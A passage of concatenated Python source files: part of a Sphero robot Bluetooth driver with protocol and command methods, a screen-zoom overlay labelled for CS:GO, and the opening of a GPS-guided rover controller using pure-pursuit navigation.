array[0] = msrp
array[1] = seq
array[2] = length
checksum = check_sum(array[0:-1])
if array[-1] != checksum:
eprint("Malfromed Packet, recieved: {0} expected: {1}".format(
array[-1], checksum))
return
else:
event = None
with self._response_lock:
if seq in self._response_event_lookup:
event = self._response_event_lookup[seq]
del self._response_event_lookup[seq]
else:
return
if msrp == 0:
self._responses[seq] = Response(True, array[3: length + 3 - 1])
else:
self._responses[seq] = Response(
False, _MSRP.get(msrp, "UNKNOWN ERROR"))
event.set()
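# Note on the framing handled above: a synchronous reply arrives as
# [0xFF][0xFF][MRSP][SEQ][DLEN][<data>][CHK]; the two SOP bytes are consumed in _recieve_loop,
# the three header bytes are read here, the remaining DLEN bytes (payload plus checksum) are
# fetched with _read(), and the checksum is verified over MRSP..payload before the waiting
# sender is woken through its event.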
def _handle_async(self):
"""
Handles async (usually sensor) messages from sphero.
It calls a parser function which will call any registered
callback for each type of data.
"""
id_code = ord(self.bluetooth.receive(1))
length_msb = ord(self.bluetooth.receive(1))
length_lsb = ord(self.bluetooth.receive(1))
length = (length_msb << 8) + length_lsb
array = self._read(length, offset=3)
array[0] = id_code
array[1] = length_msb
array[2] = length_lsb
checksum = check_sum(array[0:-1])
if array[-1] != checksum:
eprint("Malfromed Packet, recieved: {0} expected: {1}".format(
array[-1], checksum))
return
else:
data = array[3:-1]
tocall = self._asyn_func.get(id_code, nothing)
thread = threading.Thread(target=tocall, args=(data,))
thread.start()
return
def _read(self, length, offset=0):
"""
reads a given length from the bluetooth, into a buffer, starting at a given offset
"""
array = bytearray(offset)
to_read = length
while to_read > 0:
out = self.bluetooth.receive(to_read)
array += out
to_read -= len(out)
return array
@property
def _seq(self):
"""
used for assigning unique seq numbers
"""
self._seq_num += 1
if self._seq_num > 0xff:
self._seq_num = 1
return self._seq_num
def _send(self, did, cid, data, response):
"""
Sends data to the sphero. `did` is the (virtual) device id and `cid` is the command id;
for more information see the sphero docs.
`data` is the data to send.
`response` indicates whether a response is expected; if so, this method registers with
the event system and blocks until the response is received
or `self._response_time_out` elapses.
"""
event = None
seq_number = 0
data_length = len(data)
if response:
with self._response_lock:
seq_number = self._seq
event = threading.Event()
self._response_event_lookup[seq_number] = event
with self._msg_lock:
self._msg[1] = _ANSWER if response else _NO_ANSWER
self._msg[2] = did
self._msg[3] = cid
self._msg[4] = seq_number
self._msg[5] = data_length + 1
self._msg[6:6 + data_length] = data
checksum = check_sum(
self._msg[2: 6 + data_length])
self._msg[6 + data_length] = checksum
self.bluetooth.send(
buffer(self._msg[0: 6 + data_length + 1]))
if response:
if event.wait(self._response_time_out):
with self._response_lock:
return self._responses[seq_number]
# the response timed out; report failure so _stable_send can retry
return Response(False, 'response timed out')
return Response(True, '')
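# Sketch of the frame assembled above (per the Sphero API framing):
# [SOP1=0xFF][SOP2=0xFF answer / 0xFE no answer][DID][CID][SEQ][DLEN=len(data)+1][<data>][CHK].
# Assuming check_sum() implements the documented bit-inverted mod-256 sum over DID..data,
# a ping that expects an answer (did=0x00, cid=0x01, seq=0x01, no data) would go out as
# FF FF 00 01 01 01 FC, since ~((0x00 + 0x01 + 0x01 + 0x01) % 256) & 0xFF == 0xFC.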
def connect(self, retries=5):
"""
Establishes a connection and
returns a boolean indicating if the connection was successful.
`retries`: how many times to try before raising an error.
"""
res = None
while retries > 0:
try:
res = self.bluetooth.connect()
except Exception:
res = None
if not res:
retries -= 1
else:
break
if not res:
raise ValueError("Could not connect to device.")
self._recieve_thread = threading.Thread(target=self._recieve_loop)
self.bluetooth.set_timeout(5)
return res
def disconnect(self):
"""
Closes the connection to the sphero.
If sphero is not connected the call has no effect.
"""
# self.bluetooth.set_timeout(5)
self.bluetooth.close()
def _stable_send(self, did, cid, data, response):
"""
A version of send that retries until successful.
If response is false it will only try once.
"""
tries = 0
success = False
reply = None
while not success and tries < self.number_tries:
reply = self._send(did, cid, data, response)
tries += 1
success = reply.success
return reply
def is_alive(self):
return self._recieve_thread.is_alive() and self.bluetooth.is_connected()
# CORE COMMANDS
def ping(self):
"""
The Ping command is used to verify both a solid data link with the caller
and that Sphero is awake and dispatching commands.
A Response tuple is returned with response.success indicating if a response
is received back from the sphero; there is no accompanying data.
### Usage:
#!python
from spheropy.Sphero import Sphero
with Sphero("Sphero-YWY", "68:86:E7:07:59:71") as s:
response = s.ping()
print(response.success)
"""
reply = self._stable_send(_CORE, _CORE_COMMANDS['PING'], [], True)
return reply
def get_versioning(self):
"""
A Response tuple is returned; if `response.success == True`, then
`response.data` will contain a tuple of the bytes of the versioning info.
See the Sphero api docs for more info.
"""
reply = self._stable_send(
_CORE, _CORE_COMMANDS['GET VERSIONING'], [], True)
if reply.success:
parsed = struct.unpack_from(">8B", buffer(reply.data))
return Response(True, parsed)
else:
return reply
def set_device_name(self, name, response=False):
"""
This assigned name is held internally and produced as part of the Get Bluetooth Info
service below. Names are clipped at 48 characters in length to support UTF-8 sequences;
you can send something longer but the extra will be discarded.
This field defaults to the Bluetooth advertising name.
The returned Response object's data field will be empty,
but if `response` is set to `True`, its success field
will indicate if the command was successful.
"""
return self._stable_send(_CORE, _CORE_COMMANDS['SET NAME'], name, response)
def get_bluetooth_info(self):
"""
If successful the returned Response Object's data field
is a BluetoothInfo object containing the textual
name of the ball (defaults to the Bluetooth
advertising name but can be changed), the Bluetooth address and
the ID colors the ball blinks when not connected.
"""
result = self._stable_send(
_CORE, _CORE_COMMANDS['GET BLUETOOTH INFO'], [], True)
if result.success:
fmt = ">16s12sx3c"
temp_tup = struct.unpack_from(fmt, buffer(result.data))
name = temp_tup[0]
name = name[:name.find('\x00' if not py3 else b'\x00')] # python3 needs byte object
named_tuple = BluetoothInfo(
name, temp_tup[1], (temp_tup[2], temp_tup[3], temp_tup[4]))
return Response(True, named_tuple)
else:
return result
def get_power_state(self):
"""
If successful the response.data will contain a
PowerState tuple with the following fields in this order:
`recVer`: set to 1
`power_state`: 1 = Charging, 2 = OK, 3 = Low, 4 = Critical
`batt_voltage`: current battery voltage in 100ths of a volt
`num_charges`: number of recharges in the life of this sphero
`time_since_chg`: seconds awake
### Usage:
#!python
from spheropy.Sphero import Sphero
with Sphero("Sphero-YWY", "68:86:E7:07:59:71") as s:
response = s.get_power_state()
if response.success:
power = response.data
print("power_state: {}".format(power.power_state))
print("Voltage: {}".format(power.batt_voltage))
print("Number Charges: {}".format(power.num_charges))
print("Time Since Charge: {}".format(power.time_since_chg))
"""
reply = self._stable_send(
_CORE, _CORE_COMMANDS['GET POWER STATE'], [], True)
if reply.success:
parsed_answer = struct.unpack_from('>BBHHH', buffer(reply.data))
return Response(True, PowerState._make(parsed_answer))
else:
return reply
def set_power_notification(self, setting, response=False):
"""
Sets async power notification messages to be sent. To access the notifications,
register a power notification callback. Notifications are sent every 10 seconds.
The returned Response object's data field will be empty,
but if `response` is set to `True`, its success field
will indicate if the command was successful.
"""
flag = 0x01 if setting else 0x00
reply = self._stable_send(
_CORE, _CORE_COMMANDS['SET POWER NOTIFICATION'], [flag], response)
return reply
def sleep(self, wakeup_time, response=False):
"""
This command puts Sphero to sleep immediately.
The sphero will automatically reawaken after `wakeup_time` seconds.
Zero does not program a wakeup interval, so it sleeps forever.
The Sphero must be reconnected after this function is called. However,
most settings are preserved.
The returned Response object's data field will be empty,
but if `response` is set to `True`, its success field
will indicate if the command was successful.
"""
if wakeup_time < 0 or wakeup_time > 0xffff:
return Response(False, None)
big = wakeup_time >> 8
little = (wakeup_time & 0x00ff)
reply = self._stable_send(_CORE, _CORE_COMMANDS['SLEEP'], [
big, little, 0, 0, 0], response)
self.disconnect()
return reply
def get_voltage_trip_points(self):
"""
If successful the Response Object's data field contains a tuple of the
voltage trip points for what Sphero considers Low and Critical battery.
The values are expressed in 100ths of a volt,
so the defaults of 7.00V and 6.50V respectively are returned as
700 and 650.
"""
reply = self._stable_send(
_CORE, _CORE_COMMANDS['GET VOLTAGE TRIP'], [], True)
if reply.success:
parse = struct.unpack_from(">HH", buffer(reply.data))
return Response(True, parse)
else:
return reply
def set_voltage_trip_points(self, low, critical, response=False):
"""
DOES NOT WORK
not implemented
This assigns the voltage trip points for Low and Critical battery voltages.
The values are specified in 100ths of a volt and
the limitations on adjusting these away from their defaults are:
Vlow must be in the range 675 to 725 (±25)
Vcrit must be in the range 625 to 675 (±25)
There must be 0.25V of separation between the two values
"""
assert False
low = int_to_bytes(low, 2)
crit = int_to_bytes(critical, 2)
return self._stable_send(_CORE, _CORE_COMMANDS['SET VOLTAGE TRIP'], low + crit, response)
def set_inactivity_timeout(self, timeout, response=False):
"""
Sets the inactivity timeout. The value must be greater than 60 seconds
and is preserved across power cycles.
The returned Response object's data field will be empty,
but if `response` is set to `True`, its success field
will indicate if the command was successful.
"""
if timeout < 0 or timeout > 0xffff:
return Response(False, None)
big = timeout >> 8
little = (timeout & 0x00ff)
reply = self._send(_CORE, _CORE_COMMANDS['SET INACT TIMEOUT'], [
big, little], response)
return reply
def L1_diag(self):
"""
This is a developer-level command to help diagnose aberrant behavior.
Most system counters, process flags, and system states are decoded
into human readable ASCII.
If successful the Response Object's data field will contain an ASCII message.
"""
event = None
with self._response_lock:
event = threading.Event()
self._response_event_lookup['L1'] = event
self._stable_send(_CORE, _CORE_COMMANDS['L1'], [], False)
if event.wait(self._response_time_out * 10):
response = None
with self._response_lock:
response = self._responses['L1']
return Response(True, response)
else:
return Response(False, "no data recieved")
def L2_diag(self):
"""
DOES NOT WORK
This is a developers-only command to help diagnose aberrant behavior.
It is much less informative than the Level 1 command
but it is in binary format and easier to parse
Command not found
"""
assert False
return self._stable_send(_CORE, _CORE_COMMANDS['L2'], [], True)
def assign_time(self, time_value, response=False):
"""
Sets the internal timer to `time_value`.
This is the time that shows up in a collision message.
The returned Response object's data field will be empty,
but if `response` is set to `True`, its success field
will indicate if the command was successful.
"""
return self._stable_send(_CORE, _CORE_COMMANDS['ASSIGN TIME'], int_to_bytes(time_value, 4), response)
def poll_packet_times(self):
"""
Command to help profile latencies.
Returns a PacketTime tuple with fields:
offset: the maximum-likelihood time offset of the client clock to sphero's system clock
delay: round-trip delay between client and sphero
DOESN'T REALLY WORK YET...
"""
# TODO time 1 gets mangled.
time1 = int(round(time.time() * 1000))
bit1 = (time1 & 0xff000000) >> 24
bit2 = (time1 & 0x00ff0000) >> 16
bit3 = (time1 & 0x0000ff00) >> 8
bit4 = (time1 & 0x000000ff)
reply = self._stable_send(_CORE, _CORE_COMMANDS['POLL PACKET TIMES'], [
bit1, bit2, bit3, bit4], True)
time4 = int(round(time.time() * 1000)) & 0xffffffff
if reply.success:
sphero_time = struct.unpack_from('>III', buffer(reply.data))
offset = 0.5 * \
((sphero_time[1] - sphero_time[0]) + (sphero_time[2] - time4))
delay = (time4 - sphero_time[0]) - \
(sphero_time[2] - sphero_time[1])
return PacketTime(offset, delay)
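# The two expressions above are the classic NTP-style estimates: with T1 = client send time,
# T2 = sphero receive time, T3 = sphero send time and T4 = client receive time (and assuming the
# reply carries the echoed T1, then T2, then T3), offset = ((T2 - T1) + (T3 - T4)) / 2 and
# delay = (T4 - T1) - (T3 - T2).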
# _SPHERO COMMANDS
def set_heading(self, heading, response=False):
"""
Sets the sphero's heading in degrees;
the heading must be between 0 and 359. This should move the
back tail light.
The returned Response object's data field will be empty,
but if `response` is set to `True`, its success field
will indicate if the command was successful.
"""
if heading < 0 or heading > 359:
return Response(False, "heading must be between 0 and 359")
heading_bytes = int_to_bytes(heading, 2)
reply = self._stable_send(
_SPHERO, _SPHERO_COMMANDS['SET HEADING'], heading_bytes, response)
return reply
def set_stabilization(self, stablize, response=False):
"""
This turns on or off the internal stabilization of Sphero;
the IMU is used to match the ball's orientation to its set points.
The returned Response object's data field will be empty,
but if `response` is set to `True`, its success field
will indicate if the command was successful.
"""
flag = 0x01 if stablize else 0x00
return self._stable_send(_SPHERO, _SPHERO_COMMANDS['SET STABILIZATION'], [flag], response)
def set_rotation_rate(self, rate, response=False):
"""
DOESN'T WORK
This sets the rotation rate sphero will use to meet new heading commands.
A lower value offers better control, with a larger turning radius.
The rate should be in degrees/sec;
for anything above 199 the maximum value is used (400 degrees/sec).
"""
# TODO returns unknown command
if rate < 0:
return Response(False, "USE POSITIVE RATE ONLY")
if rate > 199:
rate = 200
else:
rate = int(rate / 0.784)
to_bytes = int_to_bytes(rate, 1)
return self._send(_SPHERO, _SPHERO_COMMANDS['SET ROTATION RATE'], to_bytes, response)
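# Per the Sphero API docs the rotation-rate byte is in units of roughly 0.784 deg/s, hence the
# division above; 0..199 deg/s maps to about 0..253, and the special byte 0xFF requests the
# ~400 deg/s maximum. The clamp to 200 above therefore encodes roughly 157 deg/s rather than
# that maximum.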
def get_chassis_id(self):
"""
Returns the Chassis ID as an int.
"""
response = self._stable_send(
_SPHERO, _SPHERO_COMMANDS['GET CHASSIS ID'], [], True)
if response.success:
tup = struct.unpack_from('>H', buffer(response.data))
return Response(True, tup[0])
else:
return response
def set_data_stream(self, stream_settings, frequency, packet_count=0, response=False):
"""
Sets data stream options, where `stream_settings` is a DataStreamManager object,
`frequency` is how often you want to receive data, and `packet_count` indicates
the number of packets you want to receive; set it to zero for unlimited streaming.
The returned Response object's data field will be empty,
but if `response` is set to `True`, its success field
will indicate if the command was successful.
### Usage:
#!python
from spheropy.Sphero import Sphero
from spheropy.DataStream import DataStreamManager
dsm = DataStreamManager()
dsm.acc = True
with Sphero("Sphero-YWY", "68:86:E7:07:59:71") as s:
s.set_data_stream(dsm, 10, packet_count=2)
"""
self._data_stream = stream_settings.copy()
divisor = int_to_bytes(int(400.0 / frequency), 2)
samples = int_to_bytes(self._data_stream.number_frames, 2)
mask1 = int_to_bytes(self._data_stream._mask1, 4)
mask2 = int_to_bytes(self._data_stream._mask2, 4)
data = divisor + samples + mask1 + [packet_count] + mask2
return self._stable_send(_SPHERO, _SPHERO_COMMANDS['SET DATA STRM'], data, response)
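# The sphero samples its sensors at 400 Hz and SET DATA STRM takes a divisor of that base rate,
# so int(400.0 / frequency) above yields approximately the requested rate; e.g. frequency=10
# gives a divisor of 40, i.e. one frame every 40 ticks = 10 Hz.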
def stop_data_stream(self):
"""
stops data streaming
"""
result = self._stable_send(_SPHERO, _SPHERO_COMMANDS['SET DATA STRM'], [
0xff, 0, 0, 0, 0, 0, 0, 0, 1], True)
if result.success:
self._data_stream = None
return result
def start_collision_detection(self, x_threshold, x_speed, y_threshold, y_speed, dead=1000, response=False):
"""
Starts collision detection. `threshold` values represent the max threshold,
and `speed` is added to the thresholds to scale detection with the sphero's speed;
`dead` is the minimum time between detections
in ms. All data must be in the range 0...255.
For more information see the Collision Detection pdf.
The returned Response object's data field will be empty,
but if `response` is set to `True`, its success field
will indicate if the command was successful.
"""
method = 0x01
dead = int(dead / 10)
return self._stable_send(_SPHERO, _SPHERO_COMMANDS['SET COLLISION DETECT'], [method, x_threshold, x_speed, y_threshold, y_speed, dead], response)
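# The collision dead-time parameter is expressed in 10 ms increments in the Sphero API, so the
# millisecond value supplied by the caller is divided by 10 above; the default of 1000 ms is
# sent to the ball as 100.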
def stop_collision_detection(self, response=False):
"""
Stops collision detection
"""
return self._stable_send(_SPHERO, _SPHERO_COMMANDS['SET COLLISION DETECT'], [0, 0, 0, 0, 0, 0], response)
def set_color(self, red, green, blue, default=False, response=False):
"""
Sets the color of the sphero given rgb components between 0 and 255.
If `default` is true, sphero will default to that color when first connected.
The returned Response object's data field will be empty,
but if `response` is set to `True`, its success field
will indicate if the command was successful.
### Usage:
#!python
from time import sleep
from spheropy.Sphero import Sphero
with Sphero("Sphero-YWY", "68:86:E7:07:59:71") as s:
s.set_color(255, 0, 0)
sleep(1)
s.set_color(0, 255, 0)
sleep(1)
s.set_color(0, 0, 255)
"""
red = int_to_bytes(red, 1)
blue = int_to_bytes(blue, 1)
green = int_to_bytes(green, 1)
flag = [0x01] if default else [0x00]
return self._stable_send(
_SPHERO, _SPHERO_COMMANDS['SET COLOR'], red + green + blue + flag, response)
def set_back_light(self, brightness, response=False):
"""
Controls the brightness of the back LED; the setting is not persistent.
The returned Response object's data field will be empty,
but if `response` is set to `True`, its success field
will indicate if the command was successful.
"""
brightness = int_to_bytes(brightness, 1)
return self._stable_send(
_SPHERO, _SPHERO_COMMANDS['SET BACKLIGHT'], brightness, response)
def get_color(self):
"""
If successful `response.data` contains the sphero's default
Color, which may not be the current color shown.
### Usage:
#!python
from spheropy.Sphero import Sphero
with Sphero("Sphero-YWY", "68:86:E7:07:59:71") as s:
response = s.get_color()
if response.success:
color = response.data
print("r: {} b: {} g: {}".format(color.r, color.b, color.g))
"""
response = self._stable_send(
_SPHERO, _SPHERO_COMMANDS['GET COLOR'], [], True)
if response.success:
parse = struct.unpack_from('>BBB', buffer(response.data))
return Response(True, Color._make(parse))
else:
return response
def roll(self, speed, heading, fast_rotate=False, response=False):
"""
Commands the sphero to move. `speed` ranges from 0..255, while `heading` is
in degrees from 0..359: 0 is straight, 90 is to the right, 180 is back and
270 is to the left. When `fast_rotate` is set to True sphero will rotate as
quickly as possible to the given heading, regardless of speed.
The returned Response object's data field will be empty,
but if `response` is set to `True`, its success field
will indicate if the command was successful.
"""
gobit = [0x02] if fast_rotate else [0x01]
speed = int_to_bytes(speed, 1)
heading = int_to_bytes(heading, 2)
return self._stable_send(_SPHERO, _SPHERO_COMMANDS['ROLL'], speed + heading + gobit, response)
def stop(self, response=False):
"""
Commands the Sphero to stop.
The returned Response object's data field will be empty,
but if `response` is set to `True`, its success field
will indicate if the command was successful.
"""
return self._stable_send(_SPHERO, _SPHERO_COMMANDS['ROLL'], [0, 0, 0, 0], response)
def boost(self, activate, response=True):
"""
Activates or deactivates boost, depending on the truth value of `activate`.
The returned Response object's data field will be empty,
but if `response` is set to `True`, its success field
will indicate if the command was successful.
"""
activate = 0x01 if activate else 0x00
return self._stable_send(_SPHERO, _SPHERO_COMMANDS['BOOST'], [activate], response)
def set_raw_motor_values(self, left_value, right_value, response=False):
"""
Allows direct control of the motors;
both motor values should be MotorValue tuples.
The returned Response object's data field will be empty,
but if `response` is set to `True`, its success field
will indicate if the command was successful.
"""
lmode = left_value.mode.value
lpower = left_value.power
rmode = right_value.mode.value
rpower = right_value.power
if outside_range(lpower, 0, 255) or outside_range(rpower, 0, 255):
raise SpheroException("Values outside of range")
data = [lmode, lpower, rmode, rpower]
return self._stable_send(_SPHERO, _SPHERO_COMMANDS['SET RAW MOTOR'], data, response)
def set_motion_timeout(self, timeout, response=False):
"""
This sets the ultimate timeout for the last motion command
to keep Sphero from rolling away.
The timeout is in milliseconds and defaults to 2000.
For this to take effect, the motion timeout flag must
be set in the permanent options.
The returned Response object's data field will be empty,
but if `response` is set to `True`, its success field
will indicate if the command was successful.
"""
if outside_range(timeout, 0, 0xFFFF):
raise SpheroException("Timeout outside of valid range")
timeout = int_to_bytes(timeout, 2)
return self._stable_send(_SPHERO, _SPHERO_COMMANDS['MOTION TIMEOUT'], timeout, response)
def set_permanent_options(self, options, response=False):
"""
Set options; for option information see the PermanentOptionFlag docs.
Options persist across power cycles. `options` is a PermanentOptions object.
The returned Response object's data field will be empty,
but if `response` is set to `True`, its success field
will indicate if the command was successful.
### Usage:
#!python
from spheropy.Sphero import Sphero
from spheropy.Options import PermanentOptions
po = PermanentOptions()
po.set_light_wakeup_sensitivity= True
with Sphero("Sphero-YWY", "68:86:E7:07:59:71") as s:
s.set_permanent_options(po)
"""
options = int_to_bytes(options.bitflags, 8)
return self._stable_send(_SPHERO, _SPHERO_COMMANDS['SET PERM OPTIONS'], options, response)
def get_permanent_options(self):
"""
If successful `result.data` contains the PermanentOptions of the sphero
"""
result = self._stable_send(
_SPHERO, _SPHERO_COMMANDS['GET PERM OPTIONS'], [], True)
if result.success:
settings = struct.unpack_from('>Q', buffer(result.data))
options = PermanentOptions()
options.bitflags = settings[0]
return Response(True, options)
else:
return result
def set_stop_on_disconnect(self, value=True, response=False):
"""
Sets sphero to stop on disconnect. This is a one-shot setting, so it must be reset on reconnect.
Set `value` to False to turn the behavior off.
The returned Response object's data field will be empty,
but if `response` is set to `True`, its success field
will indicate if the command was successful.
"""
value = 1 if value else 0
return self._stable_send(_SPHERO, _SPHERO_COMMANDS['SET TEMP OPTIONS'], [
0, 0, 0, value], response)
def will_stop_on_disconnect(self):
"""
Returns whether the sphero will stop when it is disconnected.
"""
result = self._stable_send(
_SPHERO, _SPHERO_COMMANDS['GET TEMP OPTOINS'], [], True)
if result.success:
return Response(True, bool(result.data))
else:
return result
# ASYNC
def register_sensor_callback(self, func):
"""
Register a function to call when a sensor message is received.
`func` must be callable and it will be started in its own thread
so as not to block the receive loop.
### Usage:
#!python
from time import sleep
from spheropy.Sphero import Sphero
from spheropy.DataStream import DataStreamManager
dsm = DataStreamManager()
dsm.acc = True
dsm.odom = True
#assume acc and odom sensor messages have been requested
def callback(sensor_data):
#sensor_data will be an array of dictionaries where
#each item is a frame sent by the sphero
for frames in sensor_data:
print(frames['acc'])
print(frames['odom'])
with Sphero("Sphero-YWY", "68:86:E7:07:59:71") as s:
s.register_sensor_callback(callback)
s.set_data_stream(dsm, 10, packet_count=2)
# callback will be called twice
sleep(1) # so data will be recieved before exit
"""
assert callable(func)
self._sensor_callback = func
def register_power_callback(self, func):
"""
Register a function to call when an async power notification is received. `func` must be callable and it will be started in its own thread. The callback will receive an integer with:
1 = charging
2 = OK
3 = Low
4 = Critical
### Usage:
#!python
import time
        from spheropy.Sphero import Sphero
def callback(notification):
print(notification)
with Sphero("Sphero-YWY", "68:86:E7:07:59:71") as s:
s.register_power_callback(callback)
s.set_power_notification(True)
time.sleep(20)
"""
assert callable(func)
self._power_callback = func
def register_collision_callback(self, func):
"""
        Registers a callback function for async collision notifications.
        `func` must be callable and it is started in its own thread.
### Usage:
#!python
import time
from spheropy.Sphero import Sphero
def callback(data):
#data will be a CollisionMsg
print(data.x)
print(data.y)
print(data.axis)
print(data.speed)
print(data.timestamp)
with Sphero("Sphero-YWY", "68:86:E7:07:59:71") as s:
s.register_collision_callback(callback)
s.start_collision_detection(100, 50, 100, 50)
time.sleep(10)
s.stop_collision_detection()
"""
assert callable(func)
self._collision_callback = func
def _power_notification(self, notification):
"""
Parses a power notification and calls the callback
"""
parsed = struct.unpack_from('B', buffer(notification))
self._power_callback(parsed[0])
def _forward_L1_diag(self, data):
"""
        This is used to forward the L1 diagnostic call. It
        is treated differently because it is sent as an async message
        even though it is in response to a system call.
"""
event = None
with self._response_lock:
self._responses['L1'] = str(data)
if 'L1' in self._response_event_lookup:
event = self._response_event_lookup['L1']
del self._response_event_lookup['L1']
event.set()
def _sensor_data(self, data):
"""
parses sensor data and forwards it to registered callback
"""
if self._data_stream is None:
self.stop_data_stream()
return
parsed = self._data_stream.parse(data)
self._sensor_callback(parsed)
def _collision_detect(self, data):
"""
        Parses collision events and calls the callback.
"""
fmt = ">3hB2HbI"
unpacked = struct.unpack_from(fmt, buffer(data))
x_list = ['x'] if unpacked[3] & 0x01 else []
y_list = ['y'] if unpacked[3] & 0x02 else []
parsed = CollisionMsg(unpacked[0], unpacked[1], unpacked[2], x_list +
y_list, unpacked[4], unpacked[5], unpacked[6], unpacked[7])
self._collision_callback(parsed)
def start(self):
self._recieve_thread.start()
|
scope.py
|
try:
from multiprocessing import Process, Queue, Pipe
import numpy as np
import signal
import cv2
import time
import os
from mss import mss
except ImportError as e:
    import os
    import sys
    print("[+] Some required modules were not found: {}".format(e))
    print("[+] Installing required modules with pip")
    os.system("pip install -r requirements.txt")
    print("[+] Required modules were installed.\n")
    print("[+] Restarting the program")
    os.system("python3 scope.py")
    sys.exit(0)
def get_screen_size():
with mss() as sct:
monitor = sct.monitors[1]
return monitor['width'], monitor['height']
def grab_screen_region(region, frame_queue):
sct = mss()
while True:
sct_img = sct.grab(region)
img = np.array(sct_img)
if(frame_queue.qsize() < 60):
frame_queue.put(img)
def display_img(frame_queue, Connection_1, Connection_2):
fps = 0
prev_frame_time = 0
new_frame_time = 0
Pid1 = Connection_1.recv()
Pid2 = Connection_2.recv()
print("[+] Frame Grab Process ID:".ljust(37), Pid1)
print("[+] Frame Queue Counter Process ID:".ljust(37), Pid2)
# fourcc = cv2.VideoWriter_fourcc(*'XVID')
# out = cv2.VideoWriter('output.avi', fourcc, 60.0, (zoomed_width, zoomed_width))
while True:
new_frame_time = time.time()
sct_img = frame_queue.get()
sct_img = cv2.resize(sct_img, (zoomed_width, zoomed_width))
cv2.circle(sct_img, (scope_width, scope_width),
int(scope_width/15), color, thickness)
sct_img = cv2.putText(sct_img, "FPS: "+str(fps), origin, font,
fontScale, color, thickness, cv2.LINE_AA)
cv2.imshow('CS:GO Scope', sct_img)
# im = np.flip(sct_img[:, :, :3], 2) # 1
# im = cv2.cvtColor(im, cv2.COLOR_BGR2RGB)
# out.write(im)
if (cv2.waitKey(1) & 0xFF) == ord('q'):
cv2.destroyAllWindows()
# out.release()
os.kill(Pid1, 9)
os.kill(Pid2, 9)
return
fps = int(1/(new_frame_time-prev_frame_time))
prev_frame_time = new_frame_time
def frame_queue_size(frame_queue):
while True:
frames_in_queue = frame_queue.qsize()
print("[+] Frames in Queue:".ljust(37), frames_in_queue, end="\r")
time.sleep(1)
screen_width, screen_height = get_screen_size()
scope_width = 300
zoom_factor = 2
zoomed_width = scope_width * zoom_factor
horizontal_mid = int((screen_width-scope_width)/2)
vertical_mid = int((screen_height-scope_width)/2)
bounding_box = {'top': vertical_mid,
'left': horizontal_mid, 'width': scope_width, 'height': scope_width}
color = (0, 255, 0)
thickness = 1
origin = (5, 26)
fontScale = 0.6
font = cv2.FONT_HERSHEY_SIMPLEX
frame_queue = Queue()
if __name__ == '__main__':
Connection_1, Connection_2 = Pipe()
print("[+] Starting Program".ljust(37))
print("[+] Press 'q' to quit".ljust(37))
print("[+] Screen Resolution:".ljust(37), screen_width, "x", screen_width)
grab_process = Process(target=grab_screen_region, args=(
bounding_box, frame_queue,))
frame_queue_process = Process(target=frame_queue_size, args=(frame_queue,))
grab_process.start()
frame_queue_process.start()
Connection_1.send(grab_process.pid)
Connection_2.send(frame_queue_process.pid)
display_process = Process(target=display_img, args=(
frame_queue, Connection_1, Connection_2,))
display_process.start()
grab_process.join()
display_process.join()
frame_queue_process.join()
print("[+] Program Terminated".ljust(37))
|
termuxTrover.py
|
#!/usr/bin/env python3
import threading
import netifaces as ni
import numpy as np
import math
import time
import socket
import signal
import logging
import pynmea2
import io
import sys
# For network tests
import requests
import urllib.parse
localPP = 1
rpiIP = "192.168.142.203"
fname = "rtkwaypoints.txt"#"5gwaypoints.txt" # "halftrackwaypoints.txt"#"newccsvwaypoints.txt"#"rtkwaypoints.txt"
L = 3 # meters
logging.basicConfig(filename='app.log', filemode='w', format='%(message)s', level=logging.INFO)
rpiPort = 40000
def TicTocGenerator():
# Generator that returns time differences
ti = 0 # initial time
tf = time.time() # final time
while True:
ti = tf
tf = time.time()
yield tf - ti # returns the time difference
TicToc = TicTocGenerator() # create an instance of the TicTocGen generator
# This will be the main function through which we define both tic() and toc()
def toc(tempBool=True):
# Prints the time difference yielded by generator instance TicToc
tempTimeInterval = next(TicToc)
if tempBool:
print("Elapsed time: %f seconds.\n" % tempTimeInterval)
def tic():
# Records a time in TicToc, marks the beginning of a time interval
toc(False)
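# A minimal usage sketch of the tic()/toc() pair above (kept commented out so it
# does not run as part of the control loop; `do_heavy_work` is a hypothetical
# placeholder for the section being timed):
# tic()
# do_heavy_work()
# toc()   # prints "Elapsed time: ... seconds."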
dstStream = "192.168.207.50" # "24.99.125.134" #should be ip of laptop running on matlab
dstreamport = 40000 # should be port of udp server running on matlab
###############################
# Pure Pursuit Config#
###############################
# Mapping and localization
waypoints = []
waypoints_utm = []
# Pure Pursuit Variables
goalRadius = 3; # meters
spacingBetweenCoarseWaypoints = 0.05  # meters between interpolated waypoints
pp_MaxTurnAngle = np.radians(14.5)  # 14.5 degrees converted to radians, to avoid too large a PWM value
MaxAngularVelocity = math.pi / 8  # radians per second (not implemented yet; needs optimization to reduce fast angular changes)
sensorDict = {}
sensorDict["compass"] = 90
currentCompass = 90
######################
# Getting GPS and Sensor from Phone
######################
#ni.ifaddresses('wlan0')
#localIP = ni.ifaddresses('wlan0')[ni.AF_INET][0]['addr']
# Create a UDP client socket for local GPS from USB/TCP bridge
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.0.0.2',1236))
ss=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
#gga=False
#rmc=False
#o=''
def udpListener_gps_heading(sensorDict):
global currentCompass
while True:
data = s.recv(115200)
sdata = data.decode('ascii')
buf = io.StringIO(sdata)
nmea_sentence = '-------'
while len(nmea_sentence) > 0:
nmea_sentence = buf.readline()
if 'GGA' in nmea_sentence:
msg_latlon = pynmea2.parse(nmea_sentence)
sensorDict["gps"] = [float(msg_latlon.latitude), float(msg_latlon.longitude)]
#o += "%s,%s" % (msg_latlon.latitude, msg_latlon.longitude)
#gga = True
if 'RMC' in nmea_sentence:
msg = pynmea2.parse(nmea_sentence)
try:
angle = float(msg.true_course)
angle = 360+(90-angle)
if angle > 360:
angle = angle - 360
except:
angle = -9999
if angle!=-9999:
sensorDict["compass"] = float(angle)
currentCompass = float(angle)
else:
sensorDict["compass"] = currentCompass
#sensorDict["compass"] = 'None'
#o += "%s," % (str(angle))
#rmc = True
#if gga and rmc:
#print(o)
#gga = False
#rmc = False
#o = ''
time.sleep(.01)
#def udpListener_gps(sensorDict):
# Listen for incoming datagrams from USB/TCP bridge app
# while True:
# bytesAddressPair = UDPServerSocket_gps.recvfrom(bufferSize)
# message = bytesAddressPair[0]
# sdata = message.decode('utf-8').split(',')
# sensorDict["gps"] = [float(sdata[1]), float(sdata[2])]
# if sdata[0] == 'None':
